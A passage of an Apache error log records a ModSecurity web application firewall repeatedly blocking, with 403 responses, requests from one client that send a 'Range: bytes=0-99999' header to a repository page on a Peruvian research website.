"Z7NXcgJrayd7JfpBdXs77wAAAIQ"] [Mon Feb 17 10:36:18.330421 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36606] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcgJrayd7JfpBdXs78AAAAIU"] [Mon Feb 17 10:36:18.428828 2025] [:error] [pid 10662:tid 140634182600448] [client 190.102.150.245:36608] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcv_97XY8xax64gWTngAAAAw"] [Mon Feb 17 10:36:18.526312 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36610] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcqvoDupyaoF2tAuc1QAAAM4"] [Mon Feb 17 10:36:18.622254 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36612] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcqvoDupyaoF2tAuc1gAAAMQ"] [Mon Feb 17 10:36:18.720600 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36614] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcqvoDupyaoF2tAuc1wAAANM"] [Mon Feb 17 10:36:18.816898 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:36616] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcqvoDupyaoF2tAuc2AAAAMY"] [Mon Feb 17 10:36:18.913088 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:36618] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcqvoDupyaoF2tAuc2QAAANA"] [Mon Feb 17 10:36:19.009493 2025] [:error] [pid 10664:tid 140634258134784] [client 190.102.150.245:36620] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs78QAAAIM"] [Mon Feb 17 10:36:19.106764 2025] [:error] [pid 10664:tid 140634274920192] [client 190.102.150.245:36622] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs78gAAAIE"] [Mon Feb 17 10:36:19.202909 2025] [:error] [pid 10664:tid 140634090280704] [client 190.102.150.245:36624] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs78wAAAJc"] [Mon Feb 17 10:36:19.300257 2025] [:error] [pid 10664:tid 140634157422336] [client 190.102.150.245:36626] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs79AAAAI8"] [Mon Feb 17 10:36:19.398701 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36628] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs79QAAAJM"] [Mon Feb 17 10:36:19.495676 2025] [:error] [pid 10664:tid 140634224563968] [client 190.102.150.245:36630] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs79gAAAIc"] [Mon Feb 17 10:36:19.592747 2025] [:error] [pid 10664:tid 140634190993152] [client 190.102.150.245:36632] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs79wAAAIs"] [Mon Feb 17 10:36:19.689750 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36634] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs7-AAAAIY"] [Mon Feb 17 10:36:19.787797 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36636] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs7-QAAAJU"] [Mon Feb 17 10:36:19.884716 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36638] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcwJrayd7JfpBdXs7-gAAAJA"] [Mon Feb 17 10:36:19.981211 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36640] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXc6voDupyaoF2tAuc2gAAAMA"] [Mon Feb 17 10:36:20.079119 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36642] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdKvoDupyaoF2tAuc2wAAAME"] [Mon Feb 17 10:36:20.177048 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:36644] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdKvoDupyaoF2tAuc3AAAANE"] [Mon Feb 17 10:36:20.274801 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36646] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs7-wAAAJQ"] [Mon Feb 17 10:36:20.372333 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36648] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs7_AAAAIQ"] [Mon Feb 17 10:36:20.469052 2025] [:error] [pid 10664:tid 140634266527488] [client 190.102.150.245:36650] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs7_QAAAII"] [Mon Feb 17 10:36:20.569373 2025] [:error] [pid 10664:tid 140634258134784] [client 190.102.150.245:36652] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs7_gAAAIM"] [Mon Feb 17 10:36:20.666157 2025] [:error] [pid 10664:tid 140634274920192] [client 190.102.150.245:36654] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs7_wAAAIE"] [Mon Feb 17 10:36:20.763902 2025] [:error] [pid 10664:tid 140634090280704] [client 190.102.150.245:36656] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs8AAAAAJc"] [Mon Feb 17 10:36:20.861039 2025] [:error] [pid 10664:tid 140634157422336] [client 190.102.150.245:36658] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdAJrayd7JfpBdXs8AQAAAI8"] [Mon Feb 17 10:36:20.958624 2025] [:error] [pid 10663:tid 140634274920192] [client 190.102.150.245:36660] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdLUcx1xj5z0EGUpRmAAAAEE"] [Mon Feb 17 10:36:21.055260 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36662] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc3QAAANY"] [Mon Feb 17 10:36:21.152695 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36664] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc3gAAAMc"] [Mon Feb 17 10:36:21.249323 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36666] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc3wAAAMg"] [Mon Feb 17 10:36:21.347767 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36668] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc4AAAAMI"] [Mon Feb 17 10:36:21.444903 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36670] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc4QAAAM0"] [Mon Feb 17 10:36:21.542524 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36672] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc4gAAAMk"] [Mon Feb 17 10:36:21.639681 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36674] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc4wAAAM4"] [Mon Feb 17 10:36:21.737875 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36676] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc5AAAAMQ"] [Mon Feb 17 10:36:21.834959 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36678] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXdavoDupyaoF2tAuc5QAAANM"] [Mon Feb 17 10:36:31.765680 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36684] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXf6voDupyaoF2tAuc5gAAAMM"] [Mon Feb 17 10:36:31.858735 2025] [:error] [pid 10663:tid 140634207778560] [client 190.102.150.245:36686] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXf7Ucx1xj5z0EGUpRmQAAAEk"] [Mon Feb 17 10:36:31.953293 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36688] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXfwJrayd7JfpBdXs8AgAAAJM"] [Mon Feb 17 10:36:32.050879 2025] [:error] [pid 10664:tid 140634199385856] [client 190.102.150.245:36690] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXgAJrayd7JfpBdXs8AwAAAIo"] [Mon Feb 17 10:36:32.147919 2025] [:error] 